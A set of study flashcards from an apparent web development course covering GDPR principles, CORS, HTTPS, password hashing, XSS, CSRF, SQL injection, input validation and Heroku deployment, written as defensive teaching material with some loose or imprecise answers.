2.10 Data Security, Validation & Ethics

Question 1

What’s the duty of a web developer?

Answer 1

To design and build applications that are not only secure but ethically responsible.

Question 2

Is there ever foolproof security?

Answer 2

No. Multiple layers of security have become the necessity, ensuring that even if one method is breached, there’s always a backup.

Question 3

In April 2016, the European Union passed the General Data Protection Regulation (GDPR). What does it pertain to?

Answer 3

It pertains to the processing of personal data of users within the EU (as well as regulations for companies based in an EU country, even if their users are outside the EU). While the GDPR regulations are EU based, it has become somewhat of an international standard for most application developers. Since the protections are for EU users in general, a company beyond the EU may still fall under the regulation’s scope

Question 4

1. general principle outlined in the GDPR: Lawfullness, Fairness, Transparency

Answer 4

“Lawfulness,” here, simply means that all data must be in accordance with the guidelines of the GDPR. “Fairness” means that data must be collected truthfully and in good faith. “Transparency” refers to keeping users informed when and for what purposes their data is being collected.

Question 5

2. general principle outlined in the DGPR: Purpose Limitation

Answer 5

Organizations should only collect data for a specified, limited, and legitimate purpose. In other words, a company can’t say it’s collecting data for one thing (e.g., to populate a social network profile) but actually be collecting it for another purpose (e.g., to provide consulting firms) without explicitly informing its users.

Question 6

3. general principle outlined in the DGPR: Data Minimization

Answer 6

Organizations shouldn’t collect more data than they need to meet their stated purposes. This ensures malicious entities can’t acquire extraneous information upon breaching your application’s security. It also makes it easier to maintain accurate data

Question 7

4. general principle outlined in the DGPR: Accuracy

Answer 7

All data should be up-to-date and accurate, and organizations should take reasonable steps to erase or rectify inaccurate data (e.g., by prompting users to update their data).

Question 8

5. general principle outlined in the DGPR: Storage Limitation

Answer 8

Similarly, organizations shouldn’t retain personal user data any longer than is absolutely required. Data should be consistently reviewed to ensure its necessity. This also helps to keep data accurate.

Question 9

6. general principle outlined in the DGPR: Integrity & Confidentiality

Answer 9

This guideline revolves around keeping data secure and confidential (i.e., not accessible by malicious entities). This is also what the rest of this Exercise will concern itself with. Keeping data secure usually involves encryption methods, which can protect data even if it’s stolen.

Question 10

What is the “same-origin policy”?

Answer 10

The same-origin policy is a feature within browsers that restricts cross-origin HTTP GET requests, in other words, GET requests from a different domain (or “origin”)

Question 11

Unless otherwise specified, if you make a GET request from one domain to another domain, what type of error will your receive?

Answer 11

No ‘Access-Control-Allow-Origin’ header is present on the requested resource. Origin ‘…’ is therefore not allowed access.

Question 12

Disadvantages of the “same-origin policy”

Answer 12

While the same-origin policy is perfect for protecting users on the web, it does create a few unwanted problems when it comes to working with APIs. By restricting requests from one domain to another, it also prohibits domains from making requests to APIs on a different server (i.e., with a different origin/domain). For instance, think of a real-estate website. Oftentimes, these types of websites will load maps of houses by making requests to the Google Maps API; under the same-origin policy, these types of requests would be restricted, as the Google Maps API is located on a different domain/origin (“maps.google.com”) than the real-estate website.

Question 13

Cross-Origin Resource Sharing (CORS)

Answer 13

What CORS does is extend HTTP requests, giving them new headers that include their domain. The receiving server can then identify where the request is coming from and allow or disallow the request from going through.

Question 14

When the server receives this request, it checks whether the included domain is allowed, then sends back an HTTP response with a new header of its own, indicating that the requesting domain was permitted:

Answer 14

“Access-Control-Allow-Origin: [list of permitted domains or a wildcard for all domains]”

Question 15

For example, if an HTTP request were sent to a server from “test.com,” the server’s response could include either an asterisk, which allows access from all domains:

Answer 15

Access-Control-Allow-Origin: *
Or, a list of specifically allowed domains, for instance:

Access-Control-Allow-Origin: https://www.test.com http://www.test.com https://site.mdn.net http://site.mdn.net https://static.sitename.net http://static.sitename.net

Question 16

what’s the command to install cors?

Answer 16

npm install cors

Question 17

Once you installed cors, what do you have to do after in your code?

Answer 17

const cors = require('cors');
app.use(cors());

Question 18

What’s a general rule for allowing requests?

Answer 18

You should only allow requests from domains that need your API.

For instance, if your application’s frontend were hosted separately from the API, you’d want to ensure the domain hosting your frontend was granted access.

The fewer domains that have access to your API, the more secure it (and the data it provides access to) will be.

Question 19

Why is it considered bad practice to use an asterisk * ?

Answer 19

Because that would grant access to all domains.

Question 20

Why are http requests unsecure?

Answer 20

Normal “http” requests are sent in plain text format—in other words, unencrypted text. If a malicious entity were to intercept them, they’d have complete access to all of the information contained within. This is especially dangerous in public WiFi spaces such as airports and coffee shops, where persons of nefarious intent can more easily intercept these requests, putting any data you might fill in on websites (credit card information, your name and address, etc.) at risk.

Question 21

Why are https requests more secure than HTTP?

Answer 21

With the “https” prefix, messages sent between the browser and the domain are encrypted using a security protocol called Secure Sockets Layer, or SSL. Requests that have been encrypted using SSL can’t be read without an encryption key. This keeps any data inside safe from prying eyes, even if the requests themselves happen to be intercepted. An SSL certificate is required to create an SSL connection. Oftentimes, if you host your website or web application on a server, the hosting provider will include (for a price) an SSL certificate as part of its hosting package. Registering one requires information about the identity of your website and your company.

Question 22

Which two cryptographix keys are created along when the SSL certificate is created?

Answer 22

Private key and public key

Question 23

What is encryption?

Answer 23

Encryption is the process of turning data into a series of unreadable characters, which can then be decrypted, or reversed back to their original form, by way of a key. This ensures data can only be read by those with the proper permission (i.e., those with the key).

Question 24

What is hashing?

Answer 24

Hashing is the process of turning data into a string of text or numbers that (with a good hashing algorithm) can’t be turned back into the original string. Once the data has been hashed, it’s no longer accessible to anyone

Question 25

When is hashing useful?

Answer 25

Whenever you log in to a website or app, you input your password. This password is usually hashed. When you first register, the password you provide is hashed, then placed into the database on the server. Then, every time you log in, the password you provide is also hashed. This hashed password is compared to the hashed password in the database, and if they match, you’re allowed to log in. This keeps your password data from ever being seen by anyone, even the creators of the app or website. It ensures that, no matter what, no one will ever know your password except you. (This is why you’ll sometimes get warning emails from companies, reminding you that they’ll never ask you for your password, and that any correspondence that does is likely a scam.)

Question 26

Node.js, you can use a module called bcrypt to hash users’ passwords and compare hashed passwords every time users log in in order to ensure a more secure login authentication process. To install bcrypt, run this command in your terminal:

Answer 26

npm install bcrypt

Question 27

What are Cross-Site Scripting Attacks (XSS)?

Answer 27

A type of attack that can take place on the frontend of your app. It involves the injection of malicious JavaScript code into a website or web application. It takes place on the client-side, in the user’s browser, and can lead to all sorts of pesky problems if allowed to occur.

Question 28

Cross-Site Scripting Attacks (XSS) attacks could include:

Answer 28

Making HTTP requests to another site using your identity (e.g., from your cookies, as mentioned earlier). For example, they could transfer money from your bank account or send spam to your contacts.

Injecting links into a page that direct you to a similar-looking site. This new site could ask you to submit personal and/or financial information, which would then be submitted not to the legitimate site, but straight to the attacker’s database.

Infecting your computer with malware.

Question 29

How can you protect yourself and users from a Cross-Site Scripting Attacks (XSS) attack?

Answer 29

Validating user input: This involves checking that all input from users contains only expected characters. Correctly formatted input fields minimize the possibility of malicious code being entered, as it’s not likely a code snippet will be able to pass a more rigid formatting check. You’ll be exploring a few of these techniques later on in this Exercise.

Escaping data: This involves ensuring all data your app receives is secure before rendering it (i.e., disallowing certain characters, such as < brackets, which can designate script tags and inject JavaScript into a web page).

Question 30

What is a Cross-Site Request Forgery, or “CSRF,” attack?

Answer 30

It’s when a hacker adopts a user’s identity to perform an action on a website they’re logged into without their consent. Because the web app believes the user is trustworthy (since they’ve already logged in), it will do whatever the hacker tells it to do, which could be anything from posting on their social network feed to transferring funds illicitly. This type of attack can be done using POST, PUT, or DELETE requests.

Question 31

What is one way of protecting against CSRF attack?

Answer 31

Via a special type of web token called a CSRF token. This token is used to ensure that the requester is safe.

Question 32

What is an SQL injection attack?

Answer 32

In this type of attack, nefarious SQL statements are provided to an application (e.g., submitted through a form), which can then be used to expose or alter data in the web application. SQL injection attacks can occur if an application doesn’t properly “sanitize” inputs provided by the user, meaning that they don’t strip away anything that could be SQL code. A hacker could, for example, enter SQL code into a form that would instruct the site’s database to return all of its stored usernames and passwords. If the app didn’t validate user input to ensure no SQL code was present, it would be vulnerabl

Question 33

What is the best way to address an SQL injection attack?

Answer 33

The best way to address this type of attack is by validating user input on the server-side, only this time, checking for code that’s of the same type as your database. For your myFlix app, you used MongoDB to set up a JSON database, so you’d want to ensure you’re taking precautions against potential JSON attacks. You’ll be setting up server-side validation for your myFlix app in just a minute.

Question 34

Why is it important to add input validation to the server side?

Answer 34

Imagine if a malicious entity made a request to your application’s login endpoint, passing a username of david123[Do something bad]. With no input validation implemented, this username would be accepted and added to your database, where it has the potential to harm your application. You can prevent this by implementing logic that checks for and bans certain characters.

Question 35

What are the recommended guidelines for input validation?

Answer 35

For usernames, only alphanumeric characters (letters and digits) should be allowed. This prevents inputs like the one above (with the tags). Ideally, though, you should still allow non-English characters, such as ë, to accommodate international users of your application.

For integers, only inputs of the numbers 0 through 9 should be allowed.

For passwords, all characters should be allowed, but often a minimum character count is required, along with a selection of numbers, lowercase, and uppercase characters..

For email addresses, there are more complicated rules you can implement, for instance, requiring an @ character and ensuring each part of a normal email address is present (you’ll remember first learning about this back in Exercise 1.7: Complex UI Elements in JS).
For a date, such as a birthday, you can require it be written in an exact date format, for instance, DD.MM.YYYY

Question 36

What is the express validator?

Answer 36

The express validator library offers a variety of validation methods for different types of inputted data.

The first thing you’ll need to do, as always, is install the library (it is a package, after all!), so go ahead and type the following into your terminal:

npm install express-validator

Question 37

What is shared & dedicated hosting?

Answer 37

Shared hosting: Your website shares a server with other customers’ websites

Dedicated hosting: Your website is hosted on its own server.

Question 38

What are the disadvantages of shared hosting?

Answer 38

Performance may suffer as the server is shared by multiple clients, and you (as a customer) don’t have full control over the server.

Question 39

What are the advantages of dedicated hosting?

Answer 39

Generally more expensive, but has better performance and control.

Even with dedicated servers, however, large businesses oftentimes need to purchase multiple servers as their web traffic grows. This can lead to wasted costs, especially if their traffic were to ever slow down again in the future.

Question 40

How do you push to Heroku using the command line?

Answer 40

git add .

git commit -m “insert your message here”

git push heroku master

Question 41

What are Environment Variables?

Answer 41

Environment variables are similar to those you define in any programming language, except that they’re not limited to the context of your Node.js server application (in this case, your myFlix API). Instead, they reside in the context of the operating system that’s hosting the server application.